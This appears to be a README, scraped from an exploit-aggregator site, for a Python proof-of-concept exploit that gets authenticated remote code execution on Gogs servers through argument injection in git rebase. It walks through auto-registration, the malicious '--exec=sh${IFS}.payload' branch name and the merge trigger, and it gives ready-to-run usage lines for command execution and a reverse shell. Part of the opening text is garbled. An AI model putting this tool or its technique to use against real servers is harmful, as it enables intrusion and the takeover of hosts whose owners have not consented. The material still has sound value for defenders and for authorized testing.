Share
## https://sploitus.com/exploit?id=75492B73-4F0E-53BD-9B94-D3C065A0A645
# Gogs RCE โ€” Argument Injection in `git rebase` (CWE-88)

Authenticated remote code execution against Gogs (` is parsed by Git as the `--exec` flag rather than a
positional argument, causing `sh -c ` to run after each replayed
commit during the rebase.

## How the exploit works

1. **Pre-flight** โ€” determines if the target runs Gogs, fingerprints the
   version via the `?v=` parameter on static assets, and checks whether user
   registration is open, captcha-protected, or disabled.
2. **Authentication** โ€” if no credentials are provided, attempts to
   auto-register (no captcha) or if captcha is enabled, prints a message
   telling the user to create an account on the target's signup page and
   re-run with `-u  -pw `. Creates an API token via
   Basic auth or the web settings page.
3. **Repository setup** โ€” creates a temporary private repository via the Gogs
   API and enables *Rebase before merging* in the settings.
4. **Git branch manipulation** โ€” locally initialises a git repo, pushes:
   - A `master` branch with a README
   - A `feature-*` branch with a divergent commit
   - A **malicious branch** named `--exec=sh${IFS}.payload` containing a
     script that runs the attacker's command in the background
5. **Pull request** โ€” opens a PR from the feature branch into the malicious
   `--exec=` branch.
6. **Trigger** โ€” POSTs to the merge endpoint with
   `merge_style=rebase_before_merging`. Gogs internally runs
   `git rebase --exec=sh${IFS}.payload`, which executes the payload after
   each replayed commit.
7. **Cleanup** โ€” deletes the temporary repository and local temp files.

## Requirements

- Python 3.6+
- `requests` (`pip install requests`)
- Local `git` installation

## Usage

```
python3 gogs.py  [options]
```

### Pre-flight check

```
python3 gogs.py http://target:3000 --preflight-only
```

Reports:
- `Registration: ENABLED (no captcha)` โ€” can auto-register
- `Registration: ENABLED (CAPTCHA DETECTED)` โ€” create an account manually on
  the target's signup page, then provide credentials with `-u` / `-pw`
- `Registration: DISABLED` โ€” need existing credentials from an admin

### Run the exploit

```bash
# Auto-register + run a command
python3 gogs.py 10.0.0.1:3000 --cmd "id > /tmp/pwned.txt"

# Existing account
python3 gogs.py 10.0.0.1:3000 -u attacker -p Password123 --cmd "whoami"

# Reverse shell
python3 gogs.py 10.0.0.1:3000 -u attacker -p Password123 --listener 10.0.0.2:4444

# Captcha enabled: create account on target's signup page, then use creds
python3 gogs.py 10.0.0.1:3000 -u myuser -pw mypassword --cmd "id"

# If login with creds fails, pass the session cookie directly
python3 gogs.py 10.0.0.1:3000 --cookie "i_like_gogs=abc123..." --cmd "id"
```

### Options

| Flag | Description |
|---|---|
| `target` | Host[:port] (e.g. `47.109.58.140:9000`) |
| `-p`, `--port` | HTTP port (default: 3000) |
| `-u`, `--username` | Gogs username |
| `-pw`, `--password` | Gogs password |
| `--cookie` | Session cookie string |
| `--cmd` | Command to execute on target |
| `--listener` | Reverse shell `host:port` |
| `--lhost` / `--lport` | Reverse shell host and port |
| `--ssl` | Use HTTPS |
| `--preflight-only` | Only run pre-flight checks |

## References

- **Rapid7 blog post** โ€” [Authenticated RCE via Argument Injection in Gogs
  (unfixed)](https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/)
- **Metasploit module** โ€” Rapid7's `exploit/multi/http/gogs_rebase_rce`
  by Jonah Burgess (CryptoCat)
  ([PR #21515](https://github.com/rapid7/metasploit-framework/pull/21515))
- **GHSA** โ€” `qf6p-p7ww-cwr9` (gogs/gogs)
- **Gogs** โ€” https://github.com/gogs/gogs

This Python PoC is inspired by the released Metasploit module. The
vulnerability was discovered and responsibly disclosed by Jonah Burgess
(CryptoCat) at Rapid7.

## Disclaimer

This tool is provided for educational purposes and authorized security testing
only. Unauthorized use against systems you do not own or have explicit
permission to test is illegal. The authors are not responsible for any misuse
or damage caused by this software.

## Note

The Gogs API does not support token deletion, so any API access tokens
created during exploitation will persist and must be removed manually
at `/user/settings/applications` on the target instance.